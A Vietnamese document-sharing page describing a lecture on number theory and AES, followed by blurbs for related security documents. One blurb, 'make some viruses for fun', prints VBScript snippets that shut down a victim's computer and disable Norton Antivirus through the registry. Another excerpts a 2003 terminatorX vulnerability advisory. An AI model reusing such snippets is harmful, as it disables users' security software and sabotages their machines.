Tìm kiếm tài liệu miễn phí

Lecture Data security and encryption - Lecture 11: Number Theory and Finite Fields

This chapter presents the following content: Number theory, divisibility & GCD, modular arithmetic with integers, Euclid’s algorithm for GCD & inverse, the AES selection process, the details of Rijndael – the AES cipher, looked at the steps in each round out of four AES stages, last two are discussed: MixColumns, AddRoundKey.



Đánh giá tài liệu

0 Bạn chưa đánh giá, hãy đánh giá cho tài liệu này


  • 5 - Rất hữu ích 0

  • 4 - Tốt 0

  • 3 - Trung bình 0

  • 2 - Tạm chấp nhận 0

  • 1 - Không hữu ích 0

Mô tả

Tài liệu cùng danh mục An ninh - Bảo mật

Tự bảo vệ mình trước những điểm truy cập không dây

Ngày nay, bạn có thể truy cập Internet một cách tự do thoải mái ở bất kỳ đâu thông qua các hot spot (điểm truy cập) WiFi như trong sân bay, nhà hàng, quán cà phê và thậm chí trong các vùng kinh doanh. Tuy nhiên, một điều đáng tiếc là khi sử dụng càng nhiều các hot spot này thì rủi ro về bảo mật càng cao. Việc kết nối đến một hot spot có thể mở ra một mối nguy hiểm.


Ngày Cá tháng Tư nhớ đến sâu Conflicker

Ngày Cá tháng Tư nhớ đến sâu Conflicker .Cách đây đúng một năm, sâu Conficker đã khiến giới bảo mật toàn cầu luôn ở tình trạng báo động đỏ và đến nay, mối nguy hiểm của sâu này vẫn chưa hết. Vào đúng ngày này một năm trước đây, giới bảo mật toàn cầu theo dõi sát sao mọi hoạt động của sâu Conflicker nhằm đề phòng một cuộc tấn công quy mô lớn vào mạng toàn cầu. May mắn là Coflicker đã không trở thành một mối đe dọa lây lan trên diện rộng hoặc gây ra những tổn hại...


Bài giảng Mật mã và ứng dụng: An toàn mạng - Trần Đức Khánh

 Bài giảng "Mật mã và ứng dụng: An toàn mạng" do Trần Đức Khánh biên soạn cung cấp cho người đọc các kiến thức: Mạng máy tính, an toàn mạng (các mối đe dọa, các biện pháp ngăn chặn). Mời các bạn cùng tham khảo.


Ethical hacking and countermeasures - phần 43

Tham khảo tài liệu 'ethical hacking and countermeasures - phần 43', công nghệ thông tin, an ninh - bảo mật phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả


7 dạng lừa đảo online phổ biến nhất

Amir Orad, Phó chủ tịch công ty bảo mật trực tuyến Actimize (Anh) là chuyên gia hàng đầu về tội phạm tài chính, bảo mật mạng, thanh toán và xác thực. Dưới đây, Amir Orad chia sẻ kinh nghiệm của mình và mô tả 7 dạng lừa đảo phổ biến nhất trên môi trường mạng. Các dạng lừa đảo trực tuyến này được phân theo hai nhóm. Nhóm đầu tiên là những dạng cố gắng đánh lừa mọi người gửi tiền trực tiếp cho kẻ lừa đảo, ví dụ như giả bộ gặp trục trặc. Nhóm thứ hai là những...


Bài giảng Bảo mật cơ sở dữ liệu: Discretionary Access Control - Trần Thị Kim Chi

Bài giảng "Bảo mật cơ sở dữ liệu: Discretionary Access Control (Điều khiển truy cập tùy ý)" trình bày các nội dung: Giới thiệu Discretionary Access Control, các loại quyền trong DAC, ưu và nhược điểm của DAC, các mô hình của DAC. Mời các bạn cùng tham khảo.


PIX/ASA Checklist

As with configuring any firewall, administrators should develop a checklist that they can use during the installation and implementation of the PIX/ASA firewall in the network


Terminatorx and Exploitable

Terminatorx Exploitable 0x333 OUTSIDERS SECURITY LABS - www.0x333.org - ~~~~~~~~~ contents ~~~~~~~~~ 0x0 Info 0x1 Description 0x2 Stack Overflow in Switch (1) 0x3 Stack Overflow in Switch (2) 0x4 Stack Overflow in $LADSPA_PATH 0x5 Format String Bug in tx_note() 0x6 Solutions 0x7 Vendor Contact [0x0 Info] author : c0wboy mail : c0wboy@tiscali.it date : 7 November 2003 advisory : outsiders-terminatorX-001.txt vendor : http://terminatorx.cx/ category : stack overflow, format bug platform : linux, unix [0x1 Description] From terminatorX's offcial web page : "terminatorX is a realtime audio synthesizer that allows you to "scratch" on digitally sampled audio data (*.wav, *.au, *.ogg, *.mp3, etc.)" . In...


CEH: Official Certified Ethical Hacker Review Guide: Exam 312-50

Prepare for the CEH certification exam with this official review guide and learn how to identify security risks to networks and computers. This easy-to-use guide is organized by exam objectives for quick review so you’ll be able to get the serious preparation you need for the challenging Certified Ethical Hacker certification exam 312-50. As the only review guide officially endorsed by EC-Council, this concise book covers all of the exam objectives and includes a CD with a host of additional study tools....


Tự tạo vài con virus chơi, dám không?

Tự tạo vài con virus chơi : Chỉ với Notepad hay Wordpad bạn đã có thể tự tạo cho mình 1 "chú" Virus dưới dạng VBSCRIPT hoặc Javascript rồi: Dưới đây là code của một số con virus nhỏ dưới dạng VBS: 1.Không cho victim khởi động máy: Dim wsh Set wsh = createobject("wscript.shell") wsh.run "RUNDLL32.EXE user.exe,exitwindows" 2. Disable NAV: Dim wsh Set wsh= CreateObject( "WScript.Shell") s1 = "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Norton Program Scheduler\Start" wsh.RegWrite s1,3, "REG_DWORD" 3. Hiển thị một message mỗi khi reboot máy: dim wsh Set wsh = CreateObject( "WScript.Shell" ) s1 = "HKLM\Software\Microsoft\Windows\CurrentVersion\WinLogon\" s2 = "LegalNoticeCaption" s3 = "LegalNoticeText" wsh.RegWrite...


Tài liệu mới download

Từ khóa được quan tâm

Có thể bạn quan tâm

Bảo mật - Mã hoá dữ liệu
  • 09/12/2009
  • 29.178
  • 897

Bộ sưu tập

Danh mục tài liệu